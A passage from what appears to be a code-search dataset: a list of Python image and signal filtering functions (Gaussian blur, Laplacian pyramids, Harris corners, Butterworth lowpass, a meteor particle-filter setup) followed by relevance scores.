sp.ndimage.convolve1d(data, kernel, axis=2)", "def flatten(img,sigma=20.) :\n\n for i in range(img.shape[0]) :\n img[i] /= np.median(img[i])\n for i in range(img.shape[1]) :\n img[:,i] /= np.median(img[:,i])\n\n hw=int(3*sigma)\n u=np.linspace(-hw,hw,2*hw+1)\n x=np.tile(u,(2*hw+1,1))\n y=x.T\n k=np.exp(-x**2/2/sigma**2-y**2/2/sigma**2)\n k /= np.sum(k)\n smooth=convolve2d(img,k,weight=None)\n img /= smooth\n\n return img", "def ParticleFilterParams(fix_params=False):\n\n ## Particle filter parameters\n\n # Q_c will be the time continuous covariance matrix. 
\n #This should be the errors in the model.\n # in the form [x_cov, y_cov, z_cov, \n # vel_x_cov, vel_y_co, vel_z_cov, \n # mass_cov, \n # sigma_cov, shape_cov, brightness_cov, tau_cov]\n \n\n Q_c = [10., 2., 2., \n 150., 50., 50., \n 5., 0, 0,\n 1e-3, 1e-10, 0., 0.0001]\n\n\n print('Qc values used:', Q_c)\n\n Q_c = np.asarray([i**2 for i in Q_c])\n\n \n # Q_c_frag is used at reinitialisation if the fragmentation option is used\n \n Q_c_frag = [0., 0., 0., \n 0.02, 0.02, 0.02, \n 0.5, 0, 0,\n 2e-3, 5e-9, 0., 0.]\n\n Q_c_frag = [i**2 for i in Q_c_frag]\n\n ## P: starting uncertainty to initialise gaussian spread of particals. \n ## P2: starting uncertainty at reinitialisation if the fragmentation option is used\n ## in the form [x_cov, y_cov, z_cov, % of vel_x_cov, % of vel_y_co, % of vel_z_cov]\n P = [50., 50., 50., 250., 250., 250.]\n P2 = [50., 50., 50., 250., 250., 250.]\n\n ## Initialise state ranges\n\n\n ## shape parameter close to a rounded brick (1.8) (A for a sphere =1.21)\n A_min = 1.21\n A_max = 3.0 \n\n ## luminosity coefficient\n tau_min = 0.0001\n tau_max = 0.1\n\n ## lists of typical meteorite densities for different types. [chond, achond, stony-iron, iron, cometary]\n pm_mean = [3000, 3100, 4500, 7500, 850]\n pm_std = [420, 133, 133, 167, 117 ]\n\n ## to choose density values according to a distribution of meteorite percentages:\n particle_choices = []\n\n # this is created using lines 257-266; uncomment if needs changing.\n random_meteor_type = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 3, 3, 3, 3, 3, 4, 4]\n\n #random_meteor_type = []\n #for i in range(80): # 80 % Chondrites\n # random_meteor_type.append(0)\n #for i in range(11): # 11 % Achondrites\n # random_meteor_type.append(1)\n #for i in range(2):\n # random_meteor_type.append(2) # 2 % Stony-Iron\n #for i in range(5):\n # random_meteor_type.append(3) # 5 % iron\n #for i in range(2):\n # random_meteor_type.append(4) # 2 % cometary\n\n ## ablation coefficeint \n #sigma_min = 0.001*1e-6\n #sigma_max = 0.5*1e-6\n\n\n #range_params = [m0_max, A_mean, A_std, pm_mean, pm_std, random_meteor_type, cd_mean, cd_std, sigma_min, sigma_max, K_min, K_max, tau_min, tau_max]\n range_params = [A_min, A_max, pm_mean, pm_std, random_meteor_type, tau_min, tau_max]\n\n if fix_params:\n \tQ_c[-4:] = [0., 0., 0., 0.]\n \tQ_c_frag[-4:] = [0., 0., 0., 0.]\n return Q_c, Q_c_frag, P, range_params", "def filterStatistical(image_object, filter_type=\"prewitt\", sigma=1):\n image_array = sitk.GetArrayFromImage(image_object)\n\n filters = {\"prewitt\": ndimage.prewitt, \"sobel\": ndimage.sobel, \n \"laplace\": ndimage.laplace, \"LoG\": ndimage.gaussian_laplace}\n\n filter_func = filters[filter_type]\n if filter_type == \"LoG\":\n image_filt_object = sitk.GetImageFromArray(filter_func(image_array, sigma))\n else: \n image_filt_object = sitk.GetImageFromArray(filter_func(image_array))\n return image_filt_object", "def _calculate_filter_parameters(self):\n dt = 1.0 / self._fs\n nl_b_wq = 180.0\n nl_b_wp = 0.14\n nlin_bw = nl_b_wp * self._cf + nl_b_wq\n nlin_phi = 2.0 * numpy.pi * nlin_bw * dt\n nlin_theta = 2.0 * numpy.pi * self._cf * dt\n nlin_cos_theta = numpy.cos(nlin_theta)\n nlin_sin_theta = numpy.sin(nlin_theta)\n nlin_alpha = -numpy.exp(-nlin_phi) * nlin_cos_theta\n nlin_a1 = 2.0 * nlin_alpha\n nlin_a2 = 
numpy.exp(-2.0 * nlin_phi)\n nlin_z1 = complex(\n (1.0 + nlin_alpha * nlin_cos_theta), -\n (nlin_alpha * nlin_sin_theta))\n nlin_z2 = complex(\n (1.0 + nlin_a1 * nlin_cos_theta), -\n (nlin_a1 * nlin_sin_theta))\n nlin_z3 = complex(\n (nlin_a2 * numpy.cos(2.0 * nlin_theta)), -\n (nlin_a2 * numpy.sin(2.0 * nlin_theta)))\n nlin_tf = (nlin_z2 + nlin_z3) / nlin_z1\n nlin_b0 = abs(nlin_tf)\n nlin_b1 = nlin_alpha * nlin_b0\n\n lin_b_wq = 235.0\n lin_b_wp = 0.2\n lin_bw = lin_b_wp * self._cf + lin_b_wq\n lin_phi = 2.0 * numpy.pi * lin_bw * dt\n lin_c_fp = 0.62\n lin_c_fq = 266.0\n lin_cf = lin_c_fp * self._cf + lin_c_fq\n lin_theta = 2.0 * numpy.pi * lin_cf * dt\n lin_cos_theta = numpy.cos(lin_theta)\n lin_sin_theta = numpy.sin(lin_theta)\n lin_alpha = -numpy.exp(-lin_phi) * lin_cos_theta\n lin_a1 = 2.0 * lin_alpha\n lin_a2 = numpy.exp(-2.0 * lin_phi)\n lin_z1 = complex(\n (1.0 + lin_alpha * lin_cos_theta), -\n (lin_alpha * lin_sin_theta))\n lin_z2 = complex(\n (1.0 + lin_a1 * lin_cos_theta), -\n (lin_a1 * lin_sin_theta))\n lin_z3 = complex(\n (lin_a2 * numpy.cos(2.0 * lin_theta)), -\n (lin_a2 * numpy.sin(2.0 * lin_theta)))\n lin_tf = (lin_z2 + lin_z3) / lin_z1\n lin_b0 = abs(lin_tf)\n lin_b1 = lin_alpha * lin_b0\n\n return [lin_a1, lin_a2, lin_b0, lin_b1, nlin_a1, nlin_a2, nlin_b0,\n nlin_b1]", "def get_gaussian_high_pass_filter(self, shape, cutoff):\n\n #Hint: May be one can use the low pass filter function to get a high pass mask\n from numpy import exp\n mask = zeros(shape)\n row_size, col_size = shape[0], shape[1]\n center_row, center_col = row_size/2 , col_size/2\n for r in range(0, row_size):\n for c in range(0, col_size):\n freq_dist = sqrt( (r-center_row)**2 + (c-center_col)**2 )\n mask[r,c] = 1 - (exp(-(freq_dist**2)/(cutoff*2)**2)) if r < cutoff else 1.0\n\n return mask", "def _initial_blur(self):\n if self.init_sigma > self.cur_sigma:\n sigma = sqrt(self.init_sigma * self.init_sigma - self.cur_sigma * self.cur_sigma)\n self.data = gaussian_filter(self.raw, sigma)\n else:\n self.data = self.raw", "def filter_low_pass(x, filt_data, cutoff, fs, order=1, rows=[0,-1]):\n\n from scipy.signal import butter, filtfilt\n import numpy as np\n import matplotlib.pyplot as plt \n\n def butter_lowpass(cutoff, fs, order=5):\n nyq = 0.5 * fs\n normal_cutoff = cutoff / nyq\n b, a = butter(order, normal_cutoff, btype='low', analog=False)\n return b, a \n\n b, a = butter_lowpass(cutoff, fs, order=order)\n \n slice_exp = filt_data[rows[0]:rows[1]]\n lp_slice_exp = filtfilt(b, a, slice_exp)\n lp = np.append(filt_data[:rows[0]],lp_slice_exp)\n lp = np.append(lp,filt_data[rows[1]:])\n\n f, ax = plt.subplots(1,1,figsize=(8,8))\n ax.plot(x,filt_data,'k',label='original data')\n ax.plot(x,lp,'r',label='filtered data')\n ax.legend(loc='best')\n\n return lp", "def filter(self, data):\n self.data = pysap.Image(data=self.flt.filter(data))", "def _filtering(cls, signal, system):\r\n\r\n if np.iscomplexobj(signal):\r\n _, filtered_signal_r, _ = sc_sig.dlsim(system, np.real(signal))\r\n _, filtered_signal_i, _ = sc_sig.dlsim(system, np.imag(signal))\r\n filtered_signal = filtered_signal_r + 1j * filtered_signal_i\r\n else:\r\n _, filtered_signal, _ = sc_sig.dlsim(system, signal)\r\n filtered_signal.shape = signal.shape\r\n return filtered_signal", "def gaussianBlur(img,ksize=(5,5),sigma=10):\n #kernel = cv2.getGaussianKernel(ksize,sigma)\n dst = np.zeros_like(img)\n cv2.GaussianBlur(src=img,dst=dst,ksize=ksize,sigmaX=0)\n return dst", "def filter_image(img):\n return cv2.bilateralFilter(img, 9, 50, 50)", "def 
low_high_filter(image, param=1.6):\r\n nan_pos = np.isnan(image)\r\n img = image.copy()\r\n mean = np.nanmean(img)\r\n img[nan_pos] = mean\r\n\r\n low_filtered_image = gaussian(img, sigma = 4)\r\n gau = gaussian(img, sigma = 4/param)\r\n high_filtered_image = gau - low_filtered_image\r\n\r\n low_filtered_image[nan_pos] = np.nan\r\n high_filtered_image[nan_pos] = np.nan\r\n return low_filtered_image, high_filtered_image", "def harris(image, threshold = 100000000, sigma = 1.5, k = 0.04):\n\n corners = []\n\n # Calculate gradients:\n X2 = [[0] * image.size[0] for y in xrange(image.size[1])]\n Y2 = [[0] * image.size[0] for y in xrange(image.size[1])]\n XY = [[0] * image.size[0] for y in xrange(image.size[1])]\n for y in xrange(1, image.size[1]-1):\n for x in xrange(1, image.size[0]-1):\n X = image.getpixel((x + 1, y)) - image.getpixel((x - 1, y))\n Y = image.getpixel((x, y + 1)) - image.getpixel((x, y - 1))\n\n X2[y][x] = X * X\n Y2[y][x] = Y * Y\n XY[y][x] = X * Y\n\n # Gaussian 3x3:\n G = [[0,0,0], [0,0,0], [0,0,0]]\n for y in xrange(3):\n for x in xrange(3):\n u, v = x-1, y-1\n G[y][x] = (math.exp(-(u*u + v*v)/(2*sigma*sigma)))\n\n # Convolve with Gaussian 3x3:\n A = [[0] * image.size[0] for y in xrange(image.size[1])]\n B = [[0] * image.size[0] for y in xrange(image.size[1])]\n C = [[0] * image.size[0] for y in xrange(image.size[1])]\n for y in xrange(1, image.size[1]-1):\n for x in xrange(1, image.size[0]-1):\n for i in xrange(3):\n for j in xrange(3):\n u, v = j-1, i-1\n A[y][x] = A[y][x] + X2[y + v][x + u] * G[i][j]\n B[y][x] = B[y][x] + Y2[y + v][x + u] * G[i][j]\n C[y][x] = C[y][x] + XY[y + v][x + u] * G[i][j]\n del X2, Y2, XY\n\n # Harris Response Function:\n R = [[0] * image.size[0] for y in xrange(image.size[1])]\n for y in xrange(image.size[1]):\n for x in xrange(image.size[0]):\n a, b, c = A[y][x], B[y][x], C[y][x]\n Tr = a + b\n Det = a * b - c * c\n R[y][x] = Det - k * Tr * Tr\n del A, B, C\n\n # Suppress Non-Maximum Points:\n for y in xrange(1, image.size[1]-1):\n for x in xrange(1, image.size[0]-1):\n maximum = True\n for dy in (-1, 0, 1):\n for dx in (-1, 0, 1):\n if R[y][x] < R[y + dy][x + dx]:\n maximum = False \n if maximum and R[y][x] > threshold:\n corners.append((x, y))\n \n return corners", "def __init__(self):\n kernel=numpy.array([[0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4]])\n VConvolutionFilter.__init__(self,kernel)", "def gauss_convolution(im_array, n_fwhm, fwhm) :\n \n sigma = fwhm / (2.*math.sqrt(2.*math.log(2.)))\n\t\n im_kernel_array = gauss_kernel(n_fwhm, sigma)\n conv_image = signal.convolve(im_array,im_kernel_array,mode = 'same')\n\n return (conv_image)", "def anisotropic_Gaussian(ksize=15, theta=np.pi, l1=6, l2=6):\n\n v = np.dot(np.array([[np.cos(theta), -np.sin(theta)], [np.sin(theta), np.cos(theta)]]), np.array([1., 0.]))\n V = np.array([[v[0], v[1]], [v[1], -v[0]]])\n D = np.array([[l1, 0], [0, l2]])\n Sigma = np.dot(np.dot(V, D), np.linalg.inv(V))\n k = gm_blur_kernel(mean=[0, 0], cov=Sigma, size=ksize)\n\n return k", "def gaussian_filter(shape=(3,3),sigma=0.5):\n m,n = [(ss-1.)/2. 
for ss in shape]\n y,x = np.ogrid[-m:m+1,-n:n+1]\n h = np.exp( -(x*x + y*y) / (2.*sigma*sigma))\n h[ h < np.finfo(h.dtype).eps*h.max() ] = 0\n sumh = h.sum()\n if sumh != 0:\n h /= sumh\n return h", "def uneven_illumination(image_filt, image, blur_radius):\n #Blur the image\n im_blur = skimage.filters.gaussian(image_filt, blur_radius)\n #Convert the original phase contrast image to a float\n im_float = skimage.img_as_float(image_filt)\n #Subtract the blurred image from the original image to correct for uneven illumination\n image_sub = im_float - im_blur\n return image_sub", "def build_laplacian_pyramid(im, max_levels, filter_size):\n filter_vec = gaus_1d(filter_size).reshape(1, filter_size)\n g_pyr = build_gaussian_pyramid(im, max_levels, filter_size)[0]\n l_pyr = []\n for i in range(len(g_pyr) - 1):\n l_im = g_pyr[i] - expand_im(g_pyr[i + 1], filter_vec)\n l_pyr.append(l_im)\n\n l_pyr.append(g_pyr[-1])\n return [l_pyr, filter_vec]", "def gaussian_blur(img, kernel=(3, 3)):\n out = cv2.GaussianBlur(img, kernel, 0)\n return out", "def filtering(image):\n output = np.array(image)\n for x in xrange(0,1):\n bilateralFilter_img = cv2.bilateralFilter(output,5, 75, 75)\n\n return bilateralFilter_img", "def _laplacian_to_image(lpyr, filter_vec, coeff):\n im = lpyr[-1]\n filter_vec = filter_vec.reshape(filter_vec.size, 1)\n for i in reversed(range(len(lpyr) - 1)):\n im = _expand(im, filter_vec) + coeff[i] * lpyr[i]\n\n return im", "def find_difference_of_gaussian_blur(image, k1, k2, *args, **kwargs):\n # TODO: Implement the method\n \n res1 = snf.gaussian_filter(image, k1)\n res2 = snf.gaussian_filter(image, k2)\n res = res2 - res1\n minn = num.amin(res)\n maxx = num.amax(res)\n if(minn - maxx != 0):\n res = (res-minn)/(maxx-minn)\n\n return res", "def __call__( self, X, Y, Z):\n xb,yb,zb = self.transform( X,Y,Z)\n \n gauss = beam( xb,yb,zb, self.w[0], self.w[1], self.l)\n intensity = (2/np.pi)* self.mW/1000. 
/self.w[0]/self.w[1] *gauss # W um^-2\n \n return uL(self.l)*intensity", "def _FWHMGauss(sigma, pixel=12):\n return sigma*2*np.sqrt(2*np.log(2))*pixel", "def Blur(image):\n\n return cv2.GaussianBlur(image,(7,7),0)", "def cs4243_lap_pyramid(gauss_pyramid):\n #use same Gaussian kernel \n\n kernel = cs4243_gaussian_kernel(7, 1)\n n = len(gauss_pyramid)\n lap_pyramid = [gauss_pyramid[n-1]] # the top layer is same as Gaussian Pyramid\n ## your code here####\n \n for i in range(n-1, 0, -1):\n upsampled_image = cs4243_upsample(gauss_pyramid[i], 2)\n expanded_image = (cs4243_filter_faster(upsampled_image, kernel)) * 4\n residual = gauss_pyramid[i-1] - expanded_image\n lap_pyramid.append(residual) \n \n ##\n \n return lap_pyramid", "def kernel_gaussiano(image: np.ndarray, sigma: float, kind: str = 'low') -> np.ndarray:\n U, V = fourier_meshgrid(image)\n D = fourier_distance(U, V)\n H = np.exp( (-1.0 * D) / (2.0 * sigma**2) )\n \n if kind == 'high' or kind == 'highpass':\n H = 1.0 - H\n \n return H", "def hover_to_inst(grad_gauss_filter: int = 7, grad_thresh: float = 0.4) -> \\\n Callable[[Tensor, Tensor], Tensor]:\n assert 0 <= grad_thresh < 1\n assert grad_gauss_filter % 2 == 1\n\n def process(np: Tensor, hv: Tensor) -> Tensor:\n \"\"\"Process function\"\"\"\n np_p = np.detach()\n h_raw = hv[:, :1].detach()\n v_raw = hv[:, 1:].detach()\n\n np_p[np_p >= 0.5] = 1\n np_p[np_p < 0.5] = 0\n\n h = batch_min_max(h_raw)\n v = batch_min_max(v_raw)\n\n s = sobel(grad_gauss_filter).to(np.device)\n\n sobel_h = torch.conv2d(h, s[None, None, ...])\n sobel_h = pad(sobel_h, [grad_gauss_filter // 2] * 4, 'replicate')\n sobel_v = torch.conv2d(v, s.T[None, None, ...])\n sobel_v = pad(sobel_v, [grad_gauss_filter // 2] * 4, 'replicate')\n\n sobel_h = 1 - batch_min_max(sobel_h)\n sobel_v = 1 - batch_min_max(sobel_v)\n\n overall = torch.max(sobel_h, sobel_v)\n overall = overall - (1 - np_p)\n overall[overall < 0] = 0\n\n energy = -(1.0 - overall) * np_p\n energy = kornia.filters.gaussian_blur2d(energy, (3, 3), sigma=(1, 1))\n energy = energy.cpu().numpy()\n\n overall = 1.0 * (overall >= grad_thresh)\n\n m = np_p - overall\n m[m < 0] = 0\n m = m.cpu().numpy()\n np_p = np_p.cpu().numpy()\n\n inst_map = []\n for i in range(np_p.shape[0]):\n m_i = binary_fill_holes(m[i][0]).astype('uint8')\n m_i = remove_small_objects(m_i > 0, 10)\n m_i = measurements.label(m_i)[0]\n w = watershed(energy[i][0], m_i, mask=np_p[i][0])\n inst_map.append(w)\n inst_map = numpy.stack(inst_map)[:, None]\n return torch.tensor(inst_map, device=np.device)\n\n return process", "def enhance(img, window=30):\n hp = highPassFilter(img, window=window)\n tmp = grayscale(img) + laplacian(img)\n return tmp", "def gaussianBlurring(frame):\n return cv2.GaussianBlur(frame, ksize =(11, 11), sigmaX = 0)", "def _apply_image_filters(self, image, filters=[]):\n derivative = image\n for filter in filters:\n derivative = filter(derivative)\n return derivative", "def harris(image, threshold=100000000, sigma=1.5, k=0.04) -> list:\n\n harris_corners = []\n width, height = image.shape[:2]\n\n # Calculate gradients:\n X2 = [[0] * width for y in range(height)]\n Y2 = [[0] * width for y in range(height)]\n XY = [[0] * width for y in range(height)]\n\n for y in range(1, height - 1):\n for x in range(1, width - 1):\n X = int(image[x + 1, y]) - int(image[x - 1, y])\n Y = int(image[x, y + 1]) - int(image[x, y - 1])\n\n X2[y][x] = int(X * X)\n Y2[y][x] = int(Y * Y)\n XY[y][x] = int(X * Y)\n\n # Gaussian 3x3:\n G = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n for y in range(3):\n for x in 
range(3):\n u, v = x - 1, y - 1\n G[y][x] = (math.exp(-(u * u + v * v) / (2 * sigma * sigma)))\n\n # Convolve with Gaussian 3x3:\n A = [[0] * width for y in range(height)]\n B = [[0] * width for y in range(height)]\n C = [[0] * width for y in range(height)]\n\n for y in range(1, height - 1):\n for x in range(1, width - 1):\n for i in range(3):\n for j in range(3):\n u, v = j - 1, i - 1\n A[y][x] = A[y][x] + X2[y + v][x + u] * G[i][j]\n B[y][x] = B[y][x] + Y2[y + v][x + u] * G[i][j]\n C[y][x] = C[y][x] + XY[y + v][x + u] * G[i][j]\n del X2, Y2, XY\n\n # Harris Response Function:\n R = [[0] * width for y in range(height)]\n for y in range(height):\n for x in range(width):\n a, b, c = A[y][x], B[y][x], C[y][x]\n Tr = a + b\n Det = a * b - c * c\n R[y][x] = Det - k * Tr * Tr\n del A, B, C\n\n # Suppress Non-Maximum Points:\n for y in range(1, height - 1):\n for x in range(1, width - 1):\n maximum = True\n for dy in (-1, 0, 1):\n for dx in (-1, 0, 1):\n if R[y][x] < R[y + dy][x + dx]:\n maximum = False\n if maximum and R[y][x] > threshold:\n harris_corners.append((x, y))\n\n return harris_corners", "def dogonvole(image, psf, kernel=(2., 2., 0.), blur=(1.3, 1.3, 0.), niter=10):\n global hot_pixels\n if not psf.sum() == 1.:\n raise ValueError(\"psf must be normalized so it sums to 1\")\n image = image.astype('float32')\n imin = image.min()\n for y, x in hot_pixels:\n image[y, x] = imin;\n \n img_bg = ndimage.gaussian_filter(image, kernel[:len(image.shape)])\n image = numpy.subtract(image, img_bg)\n numpy.place(image, image<0, 1./2**16)\n image = image.astype('uint16')\n if len(image.shape)==3:\n for i in range(image.shape[2]):\n image[:,:,i] = restoration.richardson_lucy(image[:,:,i], psf,\n niter, clip=False)\n elif len(image.shape)==2:\n image = restoration.richardson_lucy(image, psf, niter, clip=False)\n else:\n raise ValueError('image is not a supported dimensionality.')\n image = ndimage.gaussian_filter(image, blur[:len(image.shape)])\n return image", "def build_gaussian_pyramid(im, max_levels, filter_size):\n filter_vec = create_gaussian_line(filter_size)\n # creating duplicate for confy use\n temp_im = im\n pyr = [im]\n kernel = np.array([0.0625,0.25,0.375,0.25,0.0625])\n kernel = kernel.reshape((1,5))\n for i in range(max_levels - 1):\n # blurring the cur layer\n #temp_im_temp = cv2.filter2D(temp_im,-1,kernel,borderType=cv2.B)\n temp_im = scipy.signal.convolve2d(temp_im, filter_vec, mode='same')\n temp_im = scipy.signal.convolve2d(temp_im, np.transpose(filter_vec), mode='same')\n # sampling only every 2nd row and column\n temp_im = temp_im[::2, ::2]\n pyr.append(temp_im)\n\n return pyr, filter_vec" ]
[ "0.66963106", "0.65597415", "0.6478427", "0.636755", "0.6351325", "0.6253081", "0.62316626", "0.62082386", "0.617469", "0.61242366", "0.6101194", "0.6060973", "0.60049284", "0.600304", "0.60001606", "0.59720194", "0.59712464", "0.59702766", "0.5951012", "0.59331256", "0.59309727", "0.5925999", "0.58940524", "0.5878495", "0.58722365", "0.58685625", "0.58397216", "0.58289784", "0.58256596", "0.5819684", "0.5814094", "0.58098644", "0.5807658", "0.5797674", "0.57975197", "0.5796864", "0.5788471", "0.5788231", "0.5783615", "0.5765069", "0.5757359", "0.57506895", "0.5750514", "0.5745571", "0.5745537", "0.573567", "0.57223547", "0.5710077", "0.57085717", "0.57059807", "0.5702267", "0.5689001", "0.5684689", "0.56837064", "0.5675816", "0.56583875", "0.5654347", "0.56541693", "0.56536496", "0.5650384", "0.56479", "0.564008", "0.56330293", "0.5630014", "0.56244475", "0.5622842", "0.5620645", "0.5619788", "0.5611597", "0.5609136", "0.5608484", "0.56005883", "0.5599589", "0.55917853", "0.5574704", "0.55713505", "0.5544063", "0.55411696", "0.5538797", "0.5538328", "0.5536138", "0.55295634", "0.5525381", "0.55213195", "0.5504092", "0.5503005", "0.5489112", "0.54731286", "0.5469995", "0.54653287", "0.5456722", "0.54555476", "0.5452002", "0.5449253", "0.54447347", "0.54438406", "0.5443021", "0.5441252", "0.5438231", "0.5420859", "0.54066914" ]
0.0
-1
r"""Function that returns the coefficients of a 1D Laplacian filter
def get_laplacian_kernel(kernel_size: int) -> torch.Tensor:
    if not isinstance(kernel_size, int) or kernel_size % 2 == 0 or \
            kernel_size <= 0:
        raise TypeError("ksize must be an odd positive integer. Got {}"
                        .format(kernel_size))
    window_1d: torch.Tensor = laplacian_1d(kernel_size)
    return window_1d
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _laplacian_to_image(lpyr, filter_vec, coeff):\n im = lpyr[-1]\n filter_vec = filter_vec.reshape(filter_vec.size, 1)\n for i in reversed(range(len(lpyr) - 1)):\n im = _expand(im, filter_vec) + coeff[i] * lpyr[i]\n\n return im", "def slip_to_coefficients(x, y, a):\n partials = np.zeros((x.size, 3))\n partials[:, 0] = (x / a) * (9 * (x / a) / 8 - 3 / 4)\n partials[:, 1] = (1 - 3 * (x / a) / 2) * (1 + 3 * (x / a) / 2)\n partials[:, 2] = (x / a) * (9 * (x / a) / 8 + 3 / 4)\n coefficients = np.linalg.inv(partials) @ y\n return coefficients", "def L(C1s,C0s,ks,bs,sigma=1):\n # return jnp.linalg.det(FIM(q,ps,C1s,C0s,ks,bs,sigma))\n return lambda q,ps:jnp.trace(jnp.linalg.inv(FIM(C1s,C0s,ks,bs,sigma)(q,ps)))", "def laplacian_to_image(lpyr, filter_vec, coeff):\n #TODO check size\n size_list = len(lpyr)\n for i in range(size_list):\n lpyr[i] *= coeff[i]\n\n resIm = lpyr[size_list-1]\n for i in range(size_list- 1,0,-1):\n resIm = expand_im(resIm,filter_vec)\n resIm += lpyr[i-1]\n\n return resIm", "def c_coefficients(x1,x2,x3,y1,y2,y3,initial_slope,final_slope):\n\tC = c_matrix(x1,x2,x3)\n\ty = y_vector(x1,x2,x3,y1,y2,y3,initial_slope,final_slope)\n\tCCoefficients = np.dot(inv(C),y)\n\treturn(CCoefficients)", "def compute_filter_ips_self(lal_filters, spec_corr, psd=None):\n return numpy.array([lalburst.ExcessPowerFilterInnerProduct(f, f, spec_corr, psd) for f in lal_filters])", "def lfilter(pro, coeffs, axis, zi=None):\n\n b, a = coeffs\n\n # set initial conditions of the filters output\n shape = list(pro.shape)\n shape[axis] = int(max(len(b), len(a)) - 1)\n z = np.zeros(shape) if zi is None else zi\n\n # compute filter values & store current initial conditions\n for subarr in pro:\n \n y, z = sps.lfilter(b, a, subarr, axis=axis, zi=z)\n yield y", "def ben_coeffs(lin_coeffs):\n ben_cor = np.zeros(lin_coeffs.shape[0])\n ben_cor[1] = 1.0\n\n return ben_cor", "def _get_Laplacian_matrix(self, X):\n self.laplacian_mat, self.laplacian_sym_mat, self.laplacian_weights = self.laplacian.compute_laplacian(\n self.get_Affinity_matrix(X)\n )", "def ForwardFactory(self,coeffs):\n a1,a2,a3,A0,E0,G0,n = coeffs\n def forward_lorentzian(evalpts):\n \"\"\"a lorentzian peak over a 1D numpy array\nwith (a1,a2,a3,A0,E0,G0,n) = (%s,%s,%s,%s,%s,%s,%s)\"\"\" % (a1,a2,a3,A0,E0,G0,n)\n return self.evaluate((a1,a2,a3,A0,E0,G0,n),evalpts)\n return forward_lorentzian", "def getNormLaplacian(W):\n\td=[np.sum(row) for row in W]\n\tD=np.diag(d)\n\tL=D-W\n\t#Dn=D^(-1/2)\n\tDn=np.power(np.linalg.matrix_power(D,-1),0.5)\n\tLbar=np.dot(np.dot(Dn,L),Dn)\n\treturn Lbar", "def forward(self, x):\n x = torch.matmul(self.laplacian, x)\n dims = tuple(range(x.ndimension())[1:])\n x = x.pow(2).sum(dims)\n return x", "def laplacian(src: torch.Tensor, kernel_size: int) -> torch.Tensor:\n return Laplacian(kernel_size)(src)", "def coefficients(self) :\n raise NotImplementedError", "def get_laplacian(adjacency: sparse.csr_matrix) -> sparse.csr_matrix:\n weights = adjacency.dot(np.ones(adjacency.shape[0]))\n return sparse.diags(weights) - adjacency", "def compute_mesh_laplacian(mesh, weights=None, fem_b=None, lap_type=\"conformal\"):\n print(\" Computing Laplacian\")\n if weights is None:\n (weights, fem_b) = compute_mesh_weights(mesh, weight_type=lap_type)\n\n if lap_type == \"fem\":\n weights.data = weights.data / 2\n\n N = weights.shape[0]\n sB = fem_b.sum(axis=0)\n diaB = sparse.dia_matrix((sB, 0), shape=(N, N))\n B = sparse.lil_matrix(diaB + fem_b)\n s = weights.sum(axis=0)\n dia = sparse.dia_matrix((s, 0), shape=(N, N))\n L = 
sparse.lil_matrix(dia - weights)\n\n # if symmetrize == 1 & & normalize == 0\n # L = diag(sum(W, 2)) - W;\n # elseif\n # symmetrize == 1 & & normalize == 1\n # L = speye(n) - diag(sum(W, 2). ^ (-1 / 2)) * W * diag(\n # sum(W, 2). ^ (-1 / 2));\n # elseif\n # symmetrize == 0 & & normalize == 1\n # L = speye(n) - diag(sum(W, 2). ^ (-1)) * W;\n\n li = np.hstack(L.data)\n print(\" -nb Nan in Laplacian : \", len(np.where(np.isnan(li))[0]))\n print(\" -nb Inf in Laplacian : \", len(np.where(np.isinf(li))[0]))\n\n return L, B", "def uniform_laplacian(image, radius=1):\n height, width = image.shape[:2]\n window_size = 2 * radius + 1\n\n W = sparse_conv_matrix(width, height, np.ones((window_size, window_size)))\n\n return weights_to_laplacian(W)", "def coefficients(k, xi, x):\n\n import pyweno.cnonuniform\n\n x = np.asarray(x, np.float64)\n xi = np.asarray(xi, np.float64)\n\n nc = len(x) - 1\n n = len(xi)\n c = np.zeros((nc, n, k, k), np.float64)\n beta = np.zeros((nc, k, k, k), np.float64)\n varpi = np.zeros((nc, n, k), np.float64)\n\n pyweno.cnonuniform.nonuniform_coeffs(k, xi, x, c, beta, varpi)\n\n return c, beta, varpi", "def coefC(x0,y0,x1,y1):\n return (x1*y0-x0*y1)/(x1-x0)", "def lfilter_zi(b, a):\n\n # FIXME: Can this function be replaced with an appropriate\n # use of lfiltic? For example, when b,a = butter(N,Wn),\n # lfiltic(b, a, y=numpy.ones_like(a), x=numpy.ones_like(b)).\n #\n\n # We could use scipy.signal.normalize, but it uses warnings in\n # cases where a ValueError is more appropriate, and it allows\n # b to be 2D.\n b = np.atleast_1d(b)\n if b.ndim != 1:\n raise ValueError(\"Numerator b must be 1-D.\")\n a = np.atleast_1d(a)\n if a.ndim != 1:\n raise ValueError(\"Denominator a must be 1-D.\")\n\n while len(a) > 1 and a[0] == 0.0:\n a = a[1:]\n if a.size < 1:\n raise ValueError(\"There must be at least one nonzero `a` coefficient.\")\n\n if a[0] != 1.0:\n # Normalize the coefficients so a[0] == 1.\n b = b / a[0]\n a = a / a[0]\n\n n = max(len(a), len(b))\n\n # Pad a or b with zeros so they are the same length.\n if len(a) < n:\n a = np.r_[a, np.zeros(n - len(a))]\n elif len(b) < n:\n b = np.r_[b, np.zeros(n - len(b))]\n\n IminusA = np.eye(n - 1) - companion(a).T\n B = b[1:] - a[1:] * b[0]\n # Solve zi = A*zi + B\n zi = np.linalg.solve(IminusA, B)\n\n # For future reference: we could also use the following\n # explicit formulas to solve the linear system:\n #\n # zi = np.zeros(n - 1)\n # zi[0] = B.sum() / IminusA[:,0].sum()\n # asum = 1.0\n # csum = 0.0\n # for k in range(1,n-1):\n # asum += a[k]\n # csum += b[k] - a[k]*b[0]\n # zi[k] = asum*zi[0] - csum\n\n return zi", "def 